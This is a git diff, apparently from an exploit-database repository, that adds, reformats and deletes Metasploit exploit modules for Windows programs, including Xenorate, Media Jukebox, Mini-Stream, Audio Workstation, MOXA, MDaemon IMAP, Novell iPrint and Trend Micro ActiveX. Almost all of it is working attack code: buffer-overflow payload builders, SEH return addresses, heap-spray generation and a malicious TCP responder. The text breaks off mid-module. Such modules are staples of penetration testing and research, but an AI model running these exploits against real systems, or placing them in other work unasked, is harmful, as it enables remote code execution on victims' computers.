'evil.pls']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), + ], self.class) end @@ -59,12 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit << payload.encoded sploit << rand_text_alpha_upper(4652 - payload.encoded.length) - pls = sploit - print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(sploit) - file_create(pls) - end -end \ No newline at end of file +end diff --git a/platforms/windows/local/10373.rb b/platforms/windows/local/10373.rb index 58ca23b1f..d44becbce 100755 --- a/platforms/windows/local/10373.rb +++ b/platforms/windows/local/10373.rb @@ -1,73 +1,80 @@ +## +# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - include Msf::Exploit::Egghunter - + def initialize(info = {}) super(update_info(info, - 'Name' => 'Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)', + 'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)', 'Description' => %q{ - This module exploits a stack overflow in Xenorate 2.50 - By creating a specially crafted xpl playlist file, an an attacker may be able - to execute arbitrary code. + This module exploits a stack buffer overflow in Xenorate 2.50 + By creating a specially crafted xpl file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'loneferret, original by germaya_x' ], - 'Version' => '$Revision: $', + 'Author' => + [ + 'hack4love ', + 'germaya_x', + 'loneferret', + 'jduck' + ], + 'Version' => '$Revision: 10477 $', 'References' => [ + [ 'OSVDB', '57162' ], [ 'URL', 'http://www.exploit-db.com/exploits/10371' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + 'DisablePayloadHandler' => 'true', + }, 'Payload' => { 'Space' => 5100, 'BadChars' => "\x00", 'StackAdjustment' => -3500, - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, - 'DisableNops' => 'True', + 'DisableNops' => true, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll + [ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2 ], 'Privileged' => false, - 'DisclosureDate' => 'Dec 10 2009', + 'DisclosureDate' => 'Aug 19 2009', 'DefaultTarget' => 0)) register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'evil.xpl']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']), ], self.class) end def exploit - # Unleash the Egghunter! - eh_stub, eh_egg = generate_egghunter - sploit = rand_text_alpha_upper(88) - sploit << "\xEB\x06\x90\x90" - sploit << [target.ret].pack('V') - sploit << make_nops(20) - buffer << eh_stub - buffer << rand_text_alpha_upper(2000) - buffer << eh_egg * 2 + sploit << generate_seh_payload(target.ret) sploit << payload.encoded - - xpl = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") - - file_create(xpl) + file_create(sploit) end diff --git a/platforms/windows/local/10744.rb b/platforms/windows/local/10744.rb index 04e37894e..10e8400b5 100755 --- a/platforms/windows/local/10744.rb +++ b/platforms/windows/local/10744.rb @@ -1,3 +1,7 @@ +## +# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,31 +15,32 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh + include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', - 'Description' => %q{ - This module exploits a stack overflow in Media Jukebox 8.0.400 - By creating a specially crafted m3u or pls file, an an attacker may be able - to execute arbitrary code. + 'Description' => %q{ + This module exploits a stack buffer overflow in Media Jukebox 8.0.400 + By creating a specially crafted m3u or pls file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Ron Henry - ', + 'Ron Henry ', 'dijital1', ], - 'Version' => '$Revision: 7828 $', + 'Version' => '$Revision: 11516 $', 'References' => [ - [ 'OSVDB', '' ], - [ 'URL', 'http://www.exploit-db.com' ], + [ 'OSVDB', '55924' ], + [ 'CVE', '2009-2650'] ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', + 'DisablePayloadHandler' => 'true', }, 'Payload' => { @@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll ], 'Privileged' => false, + 'DisclosureDate' => 'July 1 2009', 'DefaultTarget' => 0)) register_options( @@ -60,15 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - - sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger - sploit << rand_text_alphanumeric(262) + sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger + sploit << rand_text_alphanumeric(262) sploit << generate_seh_payload(target.ret) sploit << payload.encoded print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) - end end diff --git a/platforms/windows/local/10748.rb b/platforms/windows/local/10748.rb index 33e37dd9a..3474c347d 100755 --- a/platforms/windows/local/10748.rb +++ b/platforms/windows/local/10748.rb @@ -1,3 +1,7 @@ +## +# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,27 +19,28 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit', - 'Description' => %q{ - This module exploits a stack overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able - to execute arbitrary code. + 'Description' => %q{ + This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 + By creating a specially crafted pls file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Corlan Security Team ', - 'Ron Henry - - EIP Offset fix', + 'CORELAN Security Team ', + 'Ron Henry ', # Return address update 'dijital1', ], - 'Version' => '$Revision: 7828 $', + 'Version' => '$Revision: 11516 $', 'References' => [ - [ 'OSVDB', '' ], + [ 'OSVDB', '61341' ], [ 'URL', 'http://www.exploit-db.com/exploits/10745' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', + 'DisablePayloadHandler' => 'true', }, 'Payload' => { @@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll ], 'Privileged' => false, + 'DisclosureDate' => 'Dec 25 2009', 'DefaultTarget' => 0)) register_options( @@ -60,16 +66,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - - sploit = rand_text_alphanumeric(17403) + sploit = rand_text_alphanumeric(17403) sploit << [target.ret].pack('V') sploit << "CAFE" * 8 sploit << payload.encoded print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) - print_status("Copy .pls to webserver and pass the URL to the application") - + print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application") end end + diff --git a/platforms/windows/local/16620.rb b/platforms/windows/local/16620.rb deleted file mode 100755 index 10e8400b5..000000000 --- a/platforms/windows/local/16620.rb +++ /dev/null @@ -1,78 +0,0 @@ -## -# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', - 'Description' => %q{ - This module exploits a stack buffer overflow in Media Jukebox 8.0.400 - By creating a specially crafted m3u or pls file, an an attacker may be able - to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Ron Henry ', - 'dijital1', - ], - 'Version' => '$Revision: 11516 $', - 'References' => - [ - [ 'OSVDB', '55924' ], - [ 'CVE', '2009-2650'] - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 3000, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'July 1 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']), - ], self.class) - end - - - def exploit - sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger - sploit << rand_text_alphanumeric(262) - sploit << generate_seh_payload(target.ret) - sploit << payload.encoded - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - end - -end diff --git a/platforms/windows/local/16650.rb b/platforms/windows/local/16650.rb deleted file mode 100755 index d44becbce..000000000 --- a/platforms/windows/local/16650.rb +++ /dev/null @@ -1,81 +0,0 @@ -## -# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)', - 'Description' => %q{ - This module exploits a stack buffer overflow in Xenorate 2.50 - By creating a specially crafted xpl file, an an attacker may be able - to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'hack4love ', - 'germaya_x', - 'loneferret', - 'jduck' - ], - 'Version' => '$Revision: 10477 $', - 'References' => - [ - [ 'OSVDB', '57162' ], - [ 'URL', 'http://www.exploit-db.com/exploits/10371' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 5100, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - 'DisableNops' => true, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2 - ], - 'Privileged' => false, - 'DisclosureDate' => 'Aug 19 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']), - ], self.class) - - end - - def exploit - - sploit = rand_text_alpha_upper(88) - sploit << generate_seh_payload(target.ret) - sploit << payload.encoded - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - - end - -end diff --git a/platforms/windows/local/16661.rb b/platforms/windows/local/16661.rb deleted file mode 100755 index 08a7af28e..000000000 --- a/platforms/windows/local/16661.rb +++ /dev/null @@ -1,81 +0,0 @@ -## -# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GoodRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. - When opening a malicious pls file with the Audio Workstation, - a remote attacker could overflow a buffer and execute - arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'germaya_x', 'dookie', ], - 'Version' => '$Revision: 10477 $', - 'References' => - [ - [ 'CVE', '2009-0476' ], - [ 'OSVDB', '55424' ], - [ 'URL', 'http://www.exploit-db.com/exploits/10353' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 4100, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'Dec 08 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), - ], self.class) - - end - - def exploit - - sploit = rand_text_alpha_upper(1308) - sploit << "\xeb\x16\x90\x90" - sploit << [target.ret].pack('V') - sploit << make_nops(32) - sploit << payload.encoded - sploit << rand_text_alpha_upper(4652 - payload.encoded.length) - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - - end - -end diff --git a/platforms/windows/local/16676.rb b/platforms/windows/local/16676.rb deleted file mode 100755 index 3474c347d..000000000 --- a/platforms/windows/local/16676.rb +++ /dev/null @@ -1,80 +0,0 @@ -## -# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit', - 'Description' => %q{ - This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able - to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'CORELAN Security Team ', - 'Ron Henry ', # Return address update - 'dijital1', - ], - 'Version' => '$Revision: 11516 $', - 'References' => - [ - [ 'OSVDB', '61341' ], - [ 'URL', 'http://www.exploit-db.com/exploits/10745' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 3500, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'Dec 25 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']), - ], self.class) - end - - - def exploit - sploit = rand_text_alphanumeric(17403) - sploit << [target.ret].pack('V') - sploit << "CAFE" * 8 - sploit << payload.encoded - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application") - end - -end - diff --git a/platforms/windows/local/41705.rb b/platforms/windows/local/41705.rb deleted file mode 100755 index 1c90f74b3..000000000 --- a/platforms/windows/local/41705.rb +++ /dev/null @@ -1,102 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - - Rank = AverageRanking - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When - sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) - an attacker may be able to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], - 'References' => - [ - [ 'CVE', '2010-4742' ], - [ 'OSVDB', '68986'], - [ 'URL', 'http://www.moxa.com' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] - ], - 'DisclosureDate' => 'Oct 19 2010', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), - ], self.class) - end - - def exploit - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) - - # Set the return. - ret = Rex::Text.uri_encode([target.ret].pack('L')) - - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - - file_create(content) - end - -end \ No newline at end of file diff --git a/platforms/windows/local/41713.rb b/platforms/windows/local/41713.rb deleted file mode 100755 index 0e2af869a..000000000 --- a/platforms/windows/local/41713.rb +++ /dev/null @@ -1,76 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - - Rank = GreatRanking - - include Msf::Exploit::Remote::TcpServer - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. - When sending a specially crafted MDMGw (MDM2_Gateway) response, an - attacker may be able to execute arbitrary code. - }, - 'Author' => [ 'Ruben Santamarta', 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2010-4741'], - [ 'OSVDB', '69027'], - [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ], - [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ] - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' - }, - 'Payload' => - { - 'Space' => 600, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500 - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me... - ], - 'Privileged' => false, - 'DisclosureDate' => 'Oct 20 2010', - 'DefaultTarget' => 0)) - - register_options( - [ - OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ]) - ], self.class) - end - - def on_client_connect(client) - - return if ((p = regenerate_payload(client)) == nil) - - client.get_once - - sploit = rand_text_alpha_upper(18024) - - sploit[0, 4] = [0x29001028].pack('V') - sploit[472, payload.encoded.length] = payload.encoded - sploit[1072, 8] = generate_seh_record(target.ret) - sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string - - client.put(sploit) - - handler(client) - - service.close_client(client) - - end -end \ No newline at end of file diff --git a/platforms/windows/remote/1151.pm b/platforms/windows/remote/1151.pm index 65d91af39..b1713fb09 100755 --- a/platforms/windows/remote/1151.pm +++ b/platforms/windows/remote/1151.pm @@ -1,131 +1,83 @@ ## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. +# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $ ## -package Msf::Exploit::mdaemon_imap_cram_md5; -use strict; -use base 'Msf::Exploit'; -use Msf::Socket::Tcp; -use Pex::Text; +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## -my $advanced = { }; +require 'msf/core' -my $info = { - 'Name' => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow', - 'Version' => '$Revision: 1.2 $', - 'Authors' => [ 'anonymous' ], +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32'], - 'Priv' => 1, + include Msf::Exploit::Remote::Imap - 'AutoOpts' => { 'EXITFUNC' => 'process' }, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 143], - }, + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in the CRAM-MD5 + authentication of the MDaemon IMAP service. This + vulnerability was discovered by Muts. + }, + 'Author' => [ 'anonymous' ], + 'License' => BSD_LICENSE, + 'Version' => '$Revision: 9583 $', + 'References' => + [ + [ 'CVE', '2004-1520'], + [ 'OSVDB', '11838'], + [ 'BID', '11675'], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], + ], + 'DisclosureDate' => 'Nov 12 2004', + 'DefaultTarget' => 0)) + end - 'Payload' => - { - 'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy - 'Space' => 500, - 'BadChars' => "\x00", - }, + def exploit + connect - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a buffer overflow in the CRAM-MD5 authentication of the - MDaemon IMAP service. This vulnerability was discovered by Muts. -}), + print_status("Asking for CRAM-MD5 authentication...") + sock.put("a001 authenticate cram-md5\r\n") + res = sock.get_once - 'Refs' => - [ - ['OSVDB', '11838'], - ['CVE', '2004-1520'], - ['BID', '11675'], - ], - 'Targets' => - [ - ['MDaemon IMAP 8.0.3 Windows XP SP2'], - ], + print_status("Received CRAM-MD5 answer: #{res.chomp}") + # Magic no return-address exploitation ninjaness! + buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" + req = Rex::Text.encode_base64(buf) + "\r\n" + sock.put(req) + res = sock.get_once - 'Keys' => ['mdaemon'], - }; + print_status("Received authentication reply: #{res.chomp}") + print_status("Sending LOGOUT to close the thread and trigger an exception") + sock.put("a002 LOGOUT\r\n") + res = sock.get_once -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + print_status("Received LOGOUT reply: #{res.chomp}") + select(nil,nil,nil,1) - return($self); -} + handler + disconnect + end -sub Exploit { - my $self = shift; - - my $targetHost = $self->GetVar('RHOST'); - my $targetPort = $self->GetVar('RPORT'); - my $targetIndex = $self->GetVar('TARGET'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $shellcode = $encodedPayload->Payload; - my $target = $self->Targets->[$targetIndex]; - - if (! $self->InitNops(128)) { - $self->PrintLine("[*] Failed to initialize the NOP module."); - return; - } - - my $sock = Msf::Socket::Tcp->new( - 'PeerAddr' => $targetHost, - 'PeerPort' => $targetPort, - ); - - if($sock->IsError) { - $self->PrintLine('Error creating socket: ' . $sock->GetError); - return; - } - - my $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got Banner: ' . $resp); - - my $req = "a001 authenticate cram-md5\r\n"; - $sock->Send($req); - $self->PrintLine('[*] CRAM-MD5 authentication method asked'); - - $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp); - - # Magic no return-address exploitation ninjaness! - $req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff"; - $req = Pex::Text::Base64Encode($req, '') . "\r\n"; - $sock->Send($req); - $self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent'); - - $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got authentication reply: ' . $resp); - - $req = "a002 LOGOUT\r\n"; - $sock->Send($req); - $self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception'); - - $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got LOGOUT reply: ' . $resp); - - $self->PrintLine("[*] Overflow request sent, sleeping for one second"); - select(undef, undef, undef, 1); - - $self->Handler($sock); - return; -} - -1; - -# milw0rm.com [2005-08-12] +end diff --git a/platforms/windows/remote/15072.rb b/platforms/windows/remote/15072.rb index e519dbe9d..879303bce 100755 --- a/platforms/windows/remote/15072.rb +++ b/platforms/windows/remote/15072.rb @@ -1,3 +1,14 @@ +## +# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + ## # novelliprint_callbackurl.rb # @@ -39,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. - When sending an overly long string to the 'call-back-url' parameter in an - op-client-interface-version action of ienipp.ocx an attacker may be able to - execute arbitrary code. + When sending an overly long string to the 'call-back-url' parameter in an + op-client-interface-version action of ienipp.ocx an attacker may be able to + execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer '$Revision:$', + 'Version' => '$Revision: 10429 $', 'References' => [ [ 'CVE', '2010-1527' ], @@ -85,15 +96,15 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = [target.ret].pack('V') ret = ret * 250 blocksize = 0x40000 - fillto = 500 + fillto = 500 offset = target['Offset'] - + # ActiveX parameters clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C" @@ -109,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) - html = %Q| + html = %Q| - - + + | @@ -140,4 +151,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { handler(cli) end -end \ No newline at end of file +end diff --git a/platforms/windows/remote/15168.rb b/platforms/windows/remote/15168.rb index 9b66b6d42..cf43c48cb 100755 --- a/platforms/windows/remote/15168.rb +++ b/platforms/windows/remote/15168.rb @@ -1,3 +1,14 @@ +## +# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + ## # trendmicro_extsetowner.rb # @@ -37,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution', 'Description' => %q{ - This module exploits a remote code execution vulnerability in Trend Micro - Internet Security Pro 2010 ActiveX. - When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll - an attacker may be able to execute arbitrary code. + This module exploits a remote code execution vulnerability in Trend Micro + Internet Security Pro 2010 ActiveX. + When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll + an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer '$Revision:$', + 'Version' => '$Revision: 10538 $', 'References' => [ [ 'CVE', '2010-3189' ], @@ -64,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 